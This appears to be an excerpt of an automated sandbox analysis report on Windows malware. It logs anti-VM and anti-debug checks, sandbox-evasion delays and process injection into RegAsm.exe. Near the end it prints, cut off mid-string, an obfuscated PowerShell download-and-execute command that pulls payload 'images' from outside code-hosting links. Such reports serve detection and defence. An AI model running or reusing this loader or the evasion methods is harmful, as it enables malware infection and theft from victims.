              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Delayed program exit found
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040A6C0 Sleep,ExitProcess,8_2_0040A6C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,8_2_00412E96
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1771Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1521Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3998Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5579Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 4159Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 5834Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_8-40995
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4488Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7180Thread sleep count: 3998 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7176Thread sleep count: 5579 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7244Thread sleep time: -13835058055282155s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7500Thread sleep time: -12477000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7500Thread sleep time: -17502000s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 7808Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004081F9 FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_004081F9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004072E5 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_004072E5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00407733 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_00407733
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00414795 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,8_2_00414795
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00440A59 FindFirstFileExA,8_2_00440A59
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00404CF3 FindFirstFileW,FindNextFileW,8_2_00404CF3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00405C8E __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,8_2_00405C8E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00407FDE FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_00407FDE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040511A SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,8_2_0040511A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: powershell.exe, 00000006.00000002.2379283237.000001F504D05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
              Source: powershell.exe, 00000006.00000002.2379283237.000001F504D05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
              Source: powershell.exe, 00000006.00000002.2379283237.000001F504026000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: QEMU Virtual CPU
              Source: powershell.exe, 00000006.00000002.2379283237.000001F504260000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
              Source: powershell.exe, 00000006.00000002.2379283237.000001F504D05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
              Source: powershell.exe, 00000006.00000002.2379283237.000001F504D05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
              Source: powershell.exe, 00000006.00000002.2379283237.000001F504260000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
              Source: powershell.exe, 00000006.00000002.2379283237.000001F504D05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
              Source: powershell.exe, 00000006.00000002.2379283237.000001F504D05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
              Source: powershell.exe, 00000006.00000002.2379283237.000001F504D05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
              Source: RegAsm.exe, 00000008.00000002.3511473466.0000000000E2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3507303491.0000011BA9E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3508805857.0000011BAF458000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000006.00000002.2379283237.000001F504D05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
              Source: RegAsm.exe, 00000008.00000002.3509300667.0000000000DC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
              Source: powershell.exe, 00000006.00000002.2379283237.000001F504D05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
              Source: powershell.exe, 00000006.00000002.2379283237.000001F504D05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
              Source: RegAsm.exe, 00000008.00000002.3511473466.0000000000E2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW>
              Source: powershell.exe, 00000006.00000002.2379283237.000001F504260000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
              Source: powershell.exe, 00000006.00000002.2379283237.000001F504D05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004320EC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_004320EC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040F4A7 SetEvent,GetTickCount,DeleteFileW,ExitProcess,Sleep,Sleep,URLDownloadToFileW,MessageBoxW,ExitWindowsEx,LoadLibraryA,GetProcAddress,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SetWindowTextW,StrToIntA,CreateThread,ShowWindow,SetForegroundWindow,ShowWindow,8_2_0040F4A7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00438983 mov eax, dword ptr fs:[00000030h]8_2_00438983
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040CB6C SetLastError,GetNativeSystemInfo,GetProcessHeap,HeapAlloc,SetLastError,8_2_0040CB6C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004320EC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_004320EC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0042C576 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0042C576
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0042C6C4 SetUnhandledExceptionFilter,8_2_0042C6C4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0042C8EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0042C8EC

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_1812.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1880, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1812, type: MEMORYSTR
              Injects a PE file into a foreign processes
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44D000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 464000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 46A000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 46B000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 46C000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A68008Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004124EF mouse_event,8_2_004124EF
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#F